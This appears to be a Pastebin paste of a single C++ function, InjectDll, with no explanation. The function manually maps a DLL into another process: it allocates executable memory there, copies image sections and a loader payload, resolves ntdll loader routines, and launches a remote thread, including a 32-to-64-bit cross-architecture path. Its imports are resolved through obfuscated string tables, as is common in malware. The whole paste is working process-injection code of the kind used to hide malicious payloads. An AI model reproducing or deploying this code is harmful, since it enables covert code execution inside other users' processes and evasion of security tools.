Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- BOOL InjectDll(BYTE *dllBuffer, HANDLE hProcess, BOOL x64)
- {
- #ifndef _WIN64
- if(!hProcess)
- return FALSE;
- IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *) dllBuffer;
- IMAGE_NT_HEADERS64 *ntHeaders64;
- IMAGE_NT_HEADERS32 *ntHeaders32;
- if(x64)
- ntHeaders64 = (IMAGE_NT_HEADERS64 *) (dllBuffer + dosHeader->e_lfanew);
- else
- ntHeaders32 = (IMAGE_NT_HEADERS32 *) (dllBuffer + dosHeader->e_lfanew);
- DWORD64 dllRemoteAddress = NULL;
- if(x64)
- {
- dllRemoteAddress = VirtualAllocEx64(hProcess, NULL, ntHeaders64->OptionalHeader.SizeOfImage,
- MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- }
- else
- {
- dllRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, ntHeaders32->OptionalHeader.SizeOfImage,
- MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- }
- if(!dllRemoteAddress)
- return FALSE;
- DWORD64 payloadRemoteAddress = NULL;
- if(x64)
- {
- payloadRemoteAddress = VirtualAllocEx64(hProcess, NULL, sizeof(InjectData64) + payloadSize64,
- MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- }
- else
- {
- payloadRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, sizeof(InjectData32) + payloadSize32,
- MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- }
- if(!payloadRemoteAddress)
- return FALSE;
- PVOID injectData;
- IMAGE_SECTION_HEADER *sectionHeader;
- if(x64)
- {
- sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders64 + 1);
- if(!WriteProcessMemory64(hProcess, dllRemoteAddress, dllBuffer, ntHeaders64->OptionalHeader.SizeOfHeaders, NULL))
- return FALSE;
- for(DWORD i = 0; i < ntHeaders64->FileHeader.NumberOfSections; ++i)
- {
- if(sectionHeader[i].SizeOfRawData == 0)
- continue;
- if(!WriteProcessMemory64(hProcess, dllRemoteAddress + sectionHeader[i].VirtualAddress,
- dllBuffer + sectionHeader[i].PointerToRawData, sectionHeader[i].SizeOfRawData, NULL))
- {
- return FALSE;
- }
- }
- InjectData64 injectData64;
- injectData64.base = (DWORD64) dllRemoteAddress;
- injectData64.baseRelocation = (DWORD64) dllRemoteAddress +
- ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
- injectData64.importDesc = (DWORD64) dllRemoteAddress +
- ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
- DWORD64 hNtdll64 = GetModuleHandle64((wchar_t *) Strs::wNtdll);
- injectData64.aRtlInitAnsiString = GetProcAddress64(hNtdll64, (char *) Strs::rtlInitAnsiString);
- injectData64.aRtlAnsiStringToUnicodeString = GetProcAddress64(hNtdll64, (char *) Strs::rtlAnsiStringToUnicodeString);
- injectData64.aLdrLoadDll = GetProcAddress64(hNtdll64, (char *) Strs::ldrLoadDll);
- injectData64.aLdrGetProcedureAddress = GetProcAddress64(hNtdll64, (char *) Strs::ldrGetProcedureAddress);
- injectData64.aRtlFreeUnicodeString = GetProcAddress64(hNtdll64, (char *) Strs::rtlFreeUnicodeString);
- injectData = &injectData64;
- if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress, injectData, sizeof(InjectData64), NULL))
- return FALSE;
- if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (LPVOID) payload64, payloadSize64, NULL))
- return FALSE;
- DWORD64 hThread;
- struct CLIENT_ID { DWORD64 UniqueProcess; DWORD64 UniqueThread; };
- CLIENT_ID clientId;
- DWORD64 pRtlCreateUserThread = GetProcAddress64(hNtdll64, (char *) Strs::rtlCreateUserThread);
- if(X64Call(pRtlCreateUserThread, 10, (DWORD64) hProcess, (DWORD64) NULL, (DWORD64) FALSE, (DWORD64) 0, (DWORD64) 0, (DWORD64) 0,
- (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (DWORD64) payloadRemoteAddress, (DWORD64) &hThread, (DWORD64) &clientId))
- {
- return FALSE;
- }
- }
- else
- {
- sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders32 + 1);
- if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) dllRemoteAddress, dllBuffer, ntHeaders32->OptionalHeader.SizeOfHeaders, NULL))
- return FALSE;
- for(DWORD i = 0; i < ntHeaders32->FileHeader.NumberOfSections; ++i)
- {
- if(sectionHeader[i].SizeOfRawData == 0)
- continue;
- if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) ((BYTE *) dllRemoteAddress + sectionHeader[i].VirtualAddress),
- (PVOID) ((BYTE *) dllBuffer + sectionHeader[i].PointerToRawData), sectionHeader[i].SizeOfRawData, NULL))
- {
- return FALSE;
- }
- }
- InjectData32 injectData32;
- injectData32.base = (DWORD) dllRemoteAddress;
- injectData32.baseRelocation = (DWORD) (IMAGE_BASE_RELOCATION *) ((BYTE *) dllRemoteAddress +
- ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
- injectData32.importDesc = (DWORD) (IMAGE_IMPORT_DESCRIPTOR *) ((BYTE *) dllRemoteAddress +
- ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
- HMODULE hNtdll = Funcs::pLoadLibraryA(Strs::ntdll);
- injectData32.aRtlInitAnsiString = (DWORD) GetProcAddress(hNtdll, Strs::rtlInitAnsiString);
- injectData32.aRtlAnsiStringToUnicodeString = (DWORD) GetProcAddress(hNtdll, Strs::rtlAnsiStringToUnicodeString);
- injectData32.aLdrLoadDll = (DWORD) GetProcAddress(hNtdll, Strs::ldrLoadDll);
- injectData32.aLdrGetProcedureAddress = (DWORD) GetProcAddress(hNtdll, Strs::ldrGetProcedureAddress);
- injectData32.aRtlFreeUnicodeString = (DWORD) GetProcAddress(hNtdll, Strs::rtlFreeUnicodeString);
- injectData = &injectData32;
- if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) payloadRemoteAddress, injectData, sizeof(InjectData32), NULL))
- return FALSE;
- if(!Funcs::pWriteProcessMemory(hProcess, (BYTE *) payloadRemoteAddress + sizeof(InjectData32), (LPVOID) payload32, payloadSize32, NULL))
- return FALSE;
- OSVERSIONINFOEXA osVersion = { 0 };
- osVersion.dwOSVersionInfoSize = sizeof(osVersion);
- Funcs::pGetVersionExA((LPOSVERSIONINFOA) &osVersion);
- if(osVersion.dwMajorVersion <= 5)
- {
- if(!Funcs::pCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, 0, NULL))
- return FALSE;
- }
- else
- {
- HANDLE hThread;
- CLIENT_ID clientId;
- if(Funcs::pRtlCreateUserThread(hProcess, NULL, FALSE, 0, 0, 0, ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, &hThread, &clientId))
- return FALSE;
- }
- }
- #endif
- return TRUE;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement